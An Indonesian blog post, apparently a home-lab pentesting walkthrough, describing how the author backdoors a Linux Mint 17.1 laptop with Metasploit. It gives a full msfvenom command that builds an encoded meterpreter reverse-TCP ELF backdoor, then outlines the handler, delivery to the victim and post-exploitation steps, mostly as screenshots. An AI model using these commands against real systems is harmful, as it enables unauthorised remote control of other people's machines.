Learning Pentesting 2: Hacking Linux Mint 17.1 (Rebecca) dengan Metasploit

Linux Distros ain’t exploitable? Who said that? The truth is “No system is safe“.

Sekedar melanjutkan rasa penasaran dan keingintahuan saya terhadap metasploit. Postingan sebelumnya: Pentesting Windows 7 dan Pentesting XP dengan Backtrack 4R2. Tadinya saya kepikiran untuk menggunakan file .sh yang disisipkan payload dengan decryptor msfencode. Filenya berisi scripting bash sederhana yang akan mengeluarkan dvd-rom dan mengulang-ulang prosesnya dengan looping sementara proses yang terjadi dikirim ke background sehingga tidak bisa dihentikan baik dengan ctrl+z maupun ctrl+c. Lumayan merepotkan buat end-user yang belum terbiasa dengan command ps dan kill.😆

IMG_1506

Di tengah jalan skenario berubah menjadi seperti berikut:

1. Attacker: Kali Linux 1.09a Persistence USB running on Netbook Asus eeePC 1015PX intel atom N570

2. Victim: Linux Mint 17.1 (Rebecca) running on Notebook Lenovo Thinkpad e431 intel core I7

3. ISP: Telkomsel Flash Ultima. Dibagi dengan android wifi tethering (xperia M dual)

4. IP: attacker 192.168.43.226, victim 192.168.43.44

5. Metasploit Framework. Exploit: exploit/multi/handler. Payload (3x percobaan): linux/x86/meterpreter/reverse_tcp, linux/x86/shell/reverse_tcp, dan linux/x86/metsvc_reverse_tcp. Encoder: x86/shikata_ga_nai

Langkah-langkahnya sebagai berikut:

1. Membuat file backdoor. Kali ini saya tidak menggunakan kombinasi msfpayload dan msfencode untuk membuat backdoor, melainkan menggunakan msfvenom 😀 Ngetes dulu biar dapat variasi ilmu pengetahuan dan konsepnya ga monoton. Berikut perintah yang saya ketikkan di terminal:

msfvenom -p linux/x86/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 lhost=192.168.43.226 lport=31337 -f elf > falconflame

msfvenom ini merupakan gabungan dari msfpayload dan msfencode yang belakangan ini sedang dikembangkan Offensive Security Team. Mungkin ke depannya msfpayload dan msfencode bakalan ga dipakai lagi🙂

Screenshot from 2015-02-18 17:32:29Perintah di atas maksudnya –> buat file backdoor dengan payload tsb di atas dan encoder tsb di atas, disalin dengan iterasi sebanyak 7x dengan localhost seperti tsb di atas dan localport seperti tsb di atas, jadikan file baru berwujud elf binary dengan nama falconflame. Untuk port memang sengaja saya buat 31337, bukan 4444. (besok-besok portnya saya buat sesuai tanggal lahir saja😆 ) Hasil dari file backdoornya seperti di gambar berikut:

Screenshot from 2015-02-18 17:41:36

2. Transfer file backdoornya ke target.  Untuk langkah ini silakan berkreasi. Tapi jika transfernya lewat flashdisk atau media perantara serupa, jangan lupa saat meng-copy hak aksesnya dipertahankan biar backdoor bisa langsung dieksekusi di target.

Screenshot from 2015-02-18 17:36:30

3. Siapkan Modul Exploit.

Screenshot from 2015-02-18 17:42:48

Capture completed!!!

Selanjutnya tinggal menjalankan modul post eksploitasi di meterpreter. Tapi modul yang tersedia untuk linux cukup mengecewakan. Jangan harap bisa exploit webcam, atau capture screenshot, apalagi menjalankan remote vnc. Jangankan untuk cyberstalking, untuk escalating privilege saja gagal. Opsi yang terdapat sangat minim. Tapi ada tambahan modul khusus networkpug dan sniffer yang bisa dikombinasikan dengan wireshark.

Berikut contoh beberapa tampilan meterpreter yang saya tes:

1. Ngecek Sistem Informasi Victim

Screenshot from 2015-02-18 17:43:37

2. Jalankan netstat. Untuk ngecek status koneksi victim.

Screenshot from 2015-02-18 17:44:36

3. Upload backdoor dengan jenis payload yang lain.

Screenshot from 2015-02-18 18:30:04

4. Masuk ke shell/ terminal linux victim. Hasilnya benar-benar mengecewakan. Banyak perintah yang ga jalan.

Screenshot from 2015-02-18 17:53:59

Ini masih mending pakai percobaan payload yang pertama linux/x86/meterpreter/reverse_tcp, ketika  nyoba payload kedua linux/x86/shell/reverse_tcp bakalan langsung masuk ke shell tanpa prompt…😯 Kalau ga jeli kesannya seperti proses yang menggantung atau ga selesai.😦 Dan setelah mengetik baris perintah ga ada bedanya atau ga ada batasan antar baris perintah dengan output perintah.

Screenshot from 2015-02-18 17:55:00

Percobaan ketiga jangankan masuk ke shell… Waktu file backdoor diklik aja ga ada reaksi apapun. Hasilnya lumayan lah, cukup mengecewakan tapi sekaligus membuktikan bahwa distro linux os apapun juga bisa dieksploitasi. Kalau begini sensasinya lebih nikmat ngeremote linux dengan teamviewer😆 Yang belum pernah ngetes atau belum pernah tau teamviewer itu apaan bisa cek di postingan saya yang ini –> Remote Access dengan Teamviewer.

Selamat mencoba mengeksploitasi linux apapun…🙂

Source:

http://www.offensive-security.com/metasploit-unleashed/Msfvenom

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

Devon Kearns; Mati Aharoni et al. 2011. Metasploit The Penetration Tester’s Guide. San Fransisco: No Starch Press, inc. (PDF version)

Offensive Security Team. 2011. Metasploit Unleashed (PDF version)

Dedicated to: Perusahaan Listrik Negara (PLN). Diketik dalam keadaan lampu mati…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s